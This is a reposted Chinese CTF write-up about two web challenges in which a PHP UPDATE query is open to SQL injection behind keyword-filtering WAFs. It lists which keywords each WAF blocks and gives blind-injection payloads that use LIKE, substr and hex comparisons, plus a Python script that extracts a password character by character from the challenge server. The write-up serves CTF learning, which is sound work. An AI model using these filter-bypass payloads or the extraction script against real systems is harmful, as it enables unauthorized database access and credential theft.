77777 77777(2) WriteUp 绕waf技巧学习

两个题的代码都是一样的 只是waf不一样 贴出代码

1.png

<?php
function update_point($p,$point){
    global $link;
    $q = sprintf("UPDATE users SET point=%d%s",$p,waf($point));
    if(!$query = mysqli_query($link,$q)) return FALSE;
    return TRUE;
}
if(!update_point($_POST['flag'],$_POST['hi']))
    echo 'sorry';
?>
可以看到Post两个参数flag,hi用sprintf拼接,update语句进入数据库执行,flag为整数,参数hi的类型为字符串类型,所以我们可以通过改变hi的值,来检测哪些参数被过滤。

77777 分析(查询字段为 password)

首先我们检测哪些参数被过滤了。如果被过滤了会弹出fuck。

被过滤 
updatexml
extractvalue
ascii
=
sleep
information_schema
没被过滤
select 
substr
mid 
like
where
length
in
hex
and 
or
*
|
.....
绝大多数的函数都被禁止了,所以报错注入,时间盲注等都不能用,=号也被过滤了。所以这个时候我们可以用like来代替=来进行盲注

自己测试环境 创建users表,point 和 password字段

update users set point=1231 where substr(password,1,1) like 'h';

where后面语句的意思是 password字段的第一位如果和'h'相等 (即password第一个字段为'h'),则前面的语句会执行成功,Point会成为1231 如图 2.png成功执行

2.png
实际环境执行语句:

POST:flag=1231&hi= where length(password)>15 point 不为1231
POST:flag=1231&hi= where length(password)>14 point 为1231 说明password字段长度为15
POST:flag=1231&hi= where substr(password,1,1) like 'h' point为1231 说明password字段第一位为'h'
......

所以我们可以一个字段字段的跑,写python脚本。

#coding =  utf8
import requests
import time
string = "qwertyuiopasdfghjklzxcvbnm0123456789"
url = "http://47.52.137.90:20000/"
l = ""
for i in range(1,16):
    for t in string:
        PostData = {"flag":'14521',"hi":" where substr(password,1,%s) like '%s'"%(i,l+t)}
        if "14521" in requests.post(url,data = PostData).text:
            l = l+t
            print i,l
            time.sleep(1)
            break

77777(2)分析(查询字段为pw)

被过滤了:
updatexml
extractvalue
ascii
=
sleep
in
like
where
<
(pw)
pw,
2
3
4
5
9
information_schema
and
or
没过滤:
select 
length
>
substr
hex
|
0
1
6
7
8

这次我们能用的更少 连数字都被过滤了一些 但是我们仍然能能够绕过

最终Payload:3.png

3.png

update users set point='test' | hex(substr( password ,1,1))>(67) 执行成功,point变为1 
介绍几个mysql知识
  • 可以在mysql直接进行加减 select (10+10) 输出 20
  • hex()函数是将字符或数字转换成Ascii码的16进制形式 select hex('h') 输出68

因为 2 3 4 5 9 (pw) 被过滤了所以我们可以用剩余数字组合进行加减来代替 (pw) => (%20pw%20)

所以Payload的含义是 将password字段的第一位进行hex编码,将得到的hex编码和67比较大小。

图4 图5 可知 pw字段的第一位hex编码为68 对照ascii码表可知 pw 第一位为h

4.png
5.png

图6 图7 可知 pw字段的第七位hex编码为37 对照ascii码表可知 pw 第七位为7

6.png
7.png

所以最终跑出来pw字段值

学到了很多

转载于:https://www.cnblogs.com/Mrsm1th/p/8718769.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值